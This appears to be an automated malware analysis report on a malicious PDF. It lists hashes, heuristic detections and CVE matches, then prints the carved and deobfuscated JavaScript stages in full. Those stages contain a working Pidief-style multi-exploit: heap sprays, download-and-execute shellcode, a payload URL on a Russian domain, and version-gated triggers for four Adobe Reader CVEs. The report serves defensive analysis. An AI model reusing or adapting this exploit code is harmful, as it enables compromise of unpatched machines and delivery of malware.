Malicious PDF — malware analysis report

Static analysis result for SHA-256 58b44bfe9b379253…

MALICIOUS

PDF

10.9 KB Created: 2010-02-16 11:19:27 First seen: 2026-05-10
MD5: 8e7ecf3e6a521d2532efaa78c77a9d23 SHA-1: b8280d0cb6771e33e5a3ae4f44bf2083f8cf2d0f SHA-256: 58b44bfe9b3792538449d3134493ebfe12aa00761bbbca22e9d48b22c7f2e9ea
510 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF file contains embedded JavaScript streams, one of which utilizes an eval() call. This indicates an attempt to execute obfuscated code, a common technique for downloading and running further malicious payloads. The high confidence in the eval() heuristic and the presence of JavaScript actions strongly suggest this malicious behavior.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var p='', l=app.doc, f = '%';var d=l['get'+'PageNumWo'+'rds'](3);var n=String, fA=0, eV=2;var v='ch'+'arCo'+'deAt';var fO='fr'+'omCh'+'ar'+'Code';var mV=197;var lC=l['unes'+'cape'];    for(var yV=0; yV < d; yV++){t=l['getPa'+'geNthWord'](3, yV);var pC=t.substr(t.length-eV, eV);var mP=lC(f + pC)[v](fA);p+=n[fO](mP^mV);}eval(p);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gramoffon.ru/ww/load.php?spl=pdf_2010 Referenced by PDF JavaScript
    • http://rmfo.uw/odppslpf21Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0019_000.js pdf-javascript-stream PDF /JS object 19 at offset 0x25D0 223 bytes
SHA-256: bb56b0b8244aebaf6724dd53bd228a4f9067774e6a99b0be6685b2da65c6859d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
jfk(this['info'][kfs()]);

function jfk(fds){
	var fhk='sdasa';
	var fdl=new Function(fds);
	fhk+='dassd';
	fhk+='ldasfs';
	return fdl();
}

function kfs(){
	var d='ti';
	var fsd=true;
	d+='tle';
	fsd=!fsd;
	return d;
}
stream_007_off000027e8.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x27E8 328 bytes
SHA-256: 2c694c5967b553e90bc2c512dc5fa7be2806bf467167de2c5e259f3464c2ee2d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4841 bytes
SHA-256: f7f526d4a84df574c17c50ade7b9c639ced139c196c8e169e5e3169b5d7f3041
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://gramoffon.ru/ww/load.php?spl=pdf_2010 */
var _u="http://gramoffon.ru/ww/load.php?spl=pdf_2010";

	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "?o7Dtfy96NgrXcAi0Uxjh:WvZYe_pREm=bJBFIHlSC0L1T8OKa2kPw-q%&4d/zG5M3uVnsQ.";

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";

	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();
n x.nn  x.nj?~nj? :nininj? :nj? :nj6:l������~�8T���z
legacy_pdfkit_stage_001.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4905 bytes
SHA-256: 25537811aab5fb8ca2620500615a4c5f9c7d48e8961b4138f4ffc42f5be35c68
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
/* getPageWords download URL: http://gramoffon.ru/ww/load.php?spl=pdf_2010 */
var _u="http://gramoffon.ru/ww/load.php?spl=pdf_2010";
(h((:      (     ((  
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "?o7Dtfy96NgrXcAi0Uxjh:WvZYe_pREm=bJBFIHlSC0L1T8OKa2kPw-q%&4d/zG5M3uVnsQ.";

function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";

	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();
+n.+hh.nn  .nnn+  + n.h+h( h+:~++::(+(ii+ :((:+(k+((k(k+k( ++ ((  (k( (k++k(k+ :( :+(k:(?�� z��

Open this report in the interactive analyzer, or submit your own file for analysis.